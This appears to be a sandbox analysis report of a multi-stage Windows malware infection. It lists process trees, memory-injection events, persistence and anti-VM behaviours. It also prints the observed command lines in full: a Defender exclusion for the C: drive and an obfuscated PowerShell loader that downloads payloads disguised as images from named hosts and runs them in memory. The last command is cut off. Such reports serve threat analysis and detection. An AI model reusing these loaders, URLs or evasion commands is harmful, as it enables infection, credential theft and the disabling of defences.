11872	Organizations.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
11872	Organizations.com
11872	Organizations.com
11872	Organizations.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 4052	224	random.exe	88
PID 224 wrote to memory of 4052	224	random.exe	88
PID 224 wrote to memory of 4052	224	random.exe	88
PID 4052 wrote to memory of 1732	4052	G8U31.exe	90
PID 4052 wrote to memory of 1732	4052	G8U31.exe	90
PID 4052 wrote to memory of 1732	4052	G8U31.exe	90
PID 1732 wrote to memory of 3252	1732	1P27l3.exe	93
PID 1732 wrote to memory of 3252	1732	1P27l3.exe	93
PID 1732 wrote to memory of 3252	1732	1P27l3.exe	93
PID 4052 wrote to memory of 4600	4052	G8U31.exe	94
PID 4052 wrote to memory of 4600	4052	G8U31.exe	94
PID 4052 wrote to memory of 4600	4052	G8U31.exe	94
PID 224 wrote to memory of 2340	224	random.exe	99
PID 224 wrote to memory of 2340	224	random.exe	99
PID 224 wrote to memory of 2340	224	random.exe	99
PID 3252 wrote to memory of 3000	3252	rapes.exe	102
PID 3252 wrote to memory of 3000	3252	rapes.exe	102
PID 3252 wrote to memory of 3000	3252	rapes.exe	102
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3000 wrote to memory of 3844	3000	adee9986a1.exe	104
PID 3252 wrote to memory of 2076	3252	rapes.exe	105
PID 3252 wrote to memory of 2076	3252	rapes.exe	105
PID 3252 wrote to memory of 2076	3252	rapes.exe	105
PID 2076 wrote to memory of 2540	2076	laf6w_001.exe	106
PID 2076 wrote to memory of 2540	2076	laf6w_001.exe	106
PID 2076 wrote to memory of 1848	2076	laf6w_001.exe	108
PID 2076 wrote to memory of 1848	2076	laf6w_001.exe	108
PID 2540 wrote to memory of 3960	2540	cmd.exe	109
PID 2540 wrote to memory of 3960	2540	cmd.exe	109
PID 1848 wrote to memory of 2284	1848	svchost.exe	110
PID 1848 wrote to memory of 2284	1848	svchost.exe	110
PID 1848 wrote to memory of 392	1848	svchost.exe	111
PID 1848 wrote to memory of 392	1848	svchost.exe	111
PID 3252 wrote to memory of 1120	3252	rapes.exe	113
PID 3252 wrote to memory of 1120	3252	rapes.exe	113
PID 1120 wrote to memory of 1692	1120	eBOjg2u.exe	114
PID 1120 wrote to memory of 1692	1120	eBOjg2u.exe	114
PID 1692 wrote to memory of 212	1692	cmd.exe	116
PID 1692 wrote to memory of 212	1692	cmd.exe	116
PID 1692 wrote to memory of 2496	1692	cmd.exe	117
PID 1692 wrote to memory of 2496	1692	cmd.exe	117
PID 1692 wrote to memory of 368	1692	cmd.exe	118
PID 1692 wrote to memory of 368	1692	cmd.exe	118
PID 368 wrote to memory of 6604	368	powershell.exe	119
PID 368 wrote to memory of 6604	368	powershell.exe	119
PID 3252 wrote to memory of 8324	3252	rapes.exe	122
PID 3252 wrote to memory of 8324	3252	rapes.exe	122
PID 8324 wrote to memory of 8656	8324	eBOjg2u.exe	123
PID 8324 wrote to memory of 8656	8324	eBOjg2u.exe	123
PID 8656 wrote to memory of 9036	8656	cmd.exe	125
PID 8656 wrote to memory of 9036	8656	cmd.exe	125
PID 8656 wrote to memory of 9068	8656	cmd.exe	126
PID 8656 wrote to memory of 9068	8656	cmd.exe	126
PID 8656 wrote to memory of 5124	8656	cmd.exe	127
PID 8656 wrote to memory of 5124	8656	cmd.exe	127
PID 5124 wrote to memory of 9436	5124	powershell.exe	128
PID 5124 wrote to memory of 9436	5124	powershell.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
10960	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3024
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5996

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:224
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3252
    - - C:\Users\Admin\AppData\Local\Temp\10299560101\adee9986a1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299560101\adee9986a1.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299560101\adee9986a1.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3844
    - - C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2076
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3960
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1848
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
        7⤵
        Executes dropped EXE
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\{5ecb26c7-0a6b-4841-a5b5-0c8411802ea5}\1d53210e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{5ecb26c7-0a6b-4841-a5b5-0c8411802ea5}\1d53210e.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:12812
        
        C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\cc38af32.exe
        
        C:/Users/Admin/AppData/Local/Temp/{6227f2b1-7097-4b8f-bb67-c489b459747b}/\cc38af32.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Checks for any installed AV software in registry
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        
        PID:6320
    - - C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1120
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 1.bat && 2.js
        6⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1692
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:212
        
        C:\Windows\system32\find.exe
        
        find "QEMU"
        7⤵
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6604
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:10292
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
        7⤵
        
        PID:10568
    - - C:\Users\Admin\AppData\Local\Temp\10299610101\eBOjg2u.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299610101\eBOjg2u.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:8324
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 1.bat && 2.js
        6⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:8656
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:9036
        
        C:\Windows\system32\find.exe
        
        find "QEMU"
        7⤵
        
        PID:9068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@